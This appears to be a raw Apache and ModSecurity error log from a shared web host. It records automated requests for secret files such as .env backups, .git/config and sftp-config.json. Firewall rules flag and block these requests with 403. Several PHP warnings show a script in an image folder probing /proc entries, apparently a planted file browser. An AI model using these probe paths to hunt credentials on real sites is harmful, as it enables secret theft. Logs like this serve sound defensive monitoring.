[Mon May 11 12:05:48.365601 2026] [security2:error] [pid 1256241:tid 1256263] [client 185.177.72.9:21862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGp-pkIEwRJMyDaV55SrwAAAVE"]
[Mon May 11 12:05:53.397979 2026] [security2:error] [pid 1254212:tid 1254229] [client 185.213.246.186:31379] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGqAUYQeUtAPynIs6xdMgAAAA8"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:05:55.574470 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:21268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /grails/.env.bak2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/grails/.env.bak2024"] [unique_id "agGqA0YQeUtAPynIs6xdNQAAAAo"]
[Mon May 11 12:05:55.574833 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:21268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/grails/.env.bak2024"] [unique_id "agGqA0YQeUtAPynIs6xdNQAAAAo"]
[Mon May 11 12:05:57.137578 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:21268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqA0YQeUtAPynIs6xdNQAAAAo"]
[Mon May 11 12:05:57.166177 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:21278] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /grails/.env.bak2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/grails/.env.bak2024"] [unique_id "agGqBURdw2n9wv6Ai48L4QAAAIo"]
[Mon May 11 12:05:57.166823 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:21278] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/grails/.env.bak2024"] [unique_id "agGqBURdw2n9wv6Ai48L4QAAAIo"]
[Mon May 11 12:05:58.086719 2026] [security2:error] [pid 1254179:tid 1254187] [client 185.213.247.229:27851] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGqBmS6k_SCYd1AVZqzZQAAAQY"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:05:58.417056 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:21278] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqBURdw2n9wv6Ai48L4QAAAIo"]
PHP Warning:  filesize(): stat failed for /proc/3954660/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3954660/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3954660/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3954660/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/3954660/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/3954660/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 12:06:15.346746 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 12:06:16.900696 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 12:06:18.502404 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 12:06:20.029758 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 12:06:21.594875 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/includes/error_log
[Mon May 11 12:06:23.106616 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/pro/error_log
[Mon May 11 12:06:24.699286 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/pro/error_log
[Mon May 11 12:06:26.548089 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/pro/error_log
[Mon May 11 12:06:28.082698 2026] [authz_core:error] [pid 1254242:tid 1254249] [client 145.239.65.226:51812] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/acf/acf-plugin/pro/error_log
[Mon May 11 12:06:38.239985 2026] [security2:error] [pid 1254179:tid 1254181] [client 34.130.12.157:58134] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agGqLmS6k_SCYd1AVZqzwgAAAQA"]
[Mon May 11 12:06:38.240235 2026] [security2:error] [pid 1254179:tid 1254181] [client 34.130.12.157:58134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agGqLmS6k_SCYd1AVZqzwgAAAQA"]
[Mon May 11 12:06:38.240764 2026] [security2:error] [pid 1254179:tid 1254181] [client 34.130.12.157:58134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agGqLmS6k_SCYd1AVZqzwgAAAQA"]
[Mon May 11 12:06:38.880047 2026] [authz_core:error] [pid 1256241:tid 1256256] [client 217.182.194.16:55760] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/woocommerce/src/Internal/EmailEditor/error_log
[Mon May 11 12:06:40.448482 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:54820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /heroku/.env.local.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/heroku/.env.local.alpha"] [unique_id "agGqMGS6k_SCYd1AVZqzyAAAARQ"]
[Mon May 11 12:06:40.448865 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:54820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/heroku/.env.local.alpha"] [unique_id "agGqMGS6k_SCYd1AVZqzyAAAARQ"]
[Mon May 11 12:06:40.462284 2026] [authz_core:error] [pid 1256241:tid 1256256] [client 217.182.194.16:55760] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Token/error_log
[Mon May 11 12:06:42.217732 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:54820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqMGS6k_SCYd1AVZqzyAAAARQ"]
[Mon May 11 12:06:42.249573 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:54824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /heroku/.env.local.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/heroku/.env.local.alpha"] [unique_id "agGqMr4KNmD_mZ_vlf8-SQAAAFY"]
[Mon May 11 12:06:42.250115 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:54824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/heroku/.env.local.alpha"] [unique_id "agGqMr4KNmD_mZ_vlf8-SQAAAFY"]
[Mon May 11 12:06:43.889969 2026] [security2:error] [pid 1254242:tid 1254267] [client 185.177.72.9:54824] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqMr4KNmD_mZ_vlf8-SQAAAFY"]
[Mon May 11 12:06:48.792906 2026] [security2:error] [pid 1254328:tid 1254352] [client 43.155.157.239:36430] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pweil.com"] [uri "/"] [unique_id "agGqOERdw2n9wv6Ai48MLQAAAJc"]
[Mon May 11 12:06:51.845236 2026] [authz_core:error] [pid 1254328:tid 1254340] [client 217.182.194.16:38240] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 12:06:53.338383 2026] [authz_core:error] [pid 1254328:tid 1254340] [client 217.182.194.16:38240] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 12:06:54.769208 2026] [authz_core:error] [pid 1254328:tid 1254340] [client 217.182.194.16:38240] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 12:06:56.475711 2026] [authz_core:error] [pid 1254328:tid 1254340] [client 217.182.194.16:38240] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-content/plugins/wp-mail-smtp/src/Admin/Pages/error_log
[Mon May 11 12:07:01.395661 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:50800] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /home/sftp-config.json.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/home/sftp-config.json.draft"] [unique_id "agGqRRjZymfuKpjWXeiCEQAAAMk"]
[Mon May 11 12:07:01.395878 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:50800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/home/sftp-config.json.draft"] [unique_id "agGqRRjZymfuKpjWXeiCEQAAAMk"]
[Mon May 11 12:07:03.051850 2026] [security2:error] [pid 1254133:tid 1254145] [client 185.177.72.9:50800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqRRjZymfuKpjWXeiCEQAAAMk"]
[Mon May 11 12:07:03.077200 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:50814] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /home/sftp-config.json.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/home/sftp-config.json.draft"] [unique_id "agGqR0YQeUtAPynIs6xeBQAAAAI"]
[Mon May 11 12:07:03.078416 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:50814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/home/sftp-config.json.draft"] [unique_id "agGqR0YQeUtAPynIs6xeBQAAAAI"]
[Mon May 11 12:07:04.606187 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:50814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqR0YQeUtAPynIs6xeBQAAAAI"]
[Mon May 11 12:07:14.099791 2026] [authz_core:error] [pid 1254242:tid 1254252] [client 145.239.65.226:48996] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 12:07:15.509442 2026] [authz_core:error] [pid 1254242:tid 1254252] [client 145.239.65.226:48996] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 12:07:17.096730 2026] [authz_core:error] [pid 1254242:tid 1254252] [client 145.239.65.226:48996] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 12:07:17.362128 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:21476] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /images/.env.backup2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/images/.env.backup2023"] [unique_id "agGqVWS6k_SCYd1AVZq0RwAAAQo"]
[Mon May 11 12:07:17.362535 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:21476] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/images/.env.backup2023"] [unique_id "agGqVWS6k_SCYd1AVZq0RwAAAQo"]
[Mon May 11 12:07:18.507369 2026] [authz_core:error] [pid 1254242:tid 1254252] [client 145.239.65.226:48996] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_layout_templates/error_log
[Mon May 11 12:07:18.541177 2026] [security2:error] [pid 1254179:tid 1254191] [client 185.177.72.9:21476] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqVWS6k_SCYd1AVZq0RwAAAQo"]
[Mon May 11 12:07:18.567286 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:21478] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /images/.env.backup2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/images/.env.backup2023"] [unique_id "agGqVpkIEwRJMyDaV55TiAAAAUs"]
[Mon May 11 12:07:18.567494 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:21478] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/images/.env.backup2023"] [unique_id "agGqVpkIEwRJMyDaV55TiAAAAUs"]
[Mon May 11 12:07:19.810342 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:21478] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqVpkIEwRJMyDaV55TiAAAAUs"]
[Mon May 11 12:07:29.238163 2026] [:error] [pid 1254328:tid 1254348] [client 94.102.49.148:20728] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 12:07:38.088484 2026] [authz_core:error] [pid 1254328:tid 1254347] [client 145.239.65.226:45000] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_stylekits_config/error_log
[Mon May 11 12:07:39.495474 2026] [authz_core:error] [pid 1254328:tid 1254347] [client 145.239.65.226:45000] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_stylekits_config/error_log
[Mon May 11 12:07:40.934913 2026] [authz_core:error] [pid 1254328:tid 1254347] [client 145.239.65.226:45000] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_stylekits_config/error_log
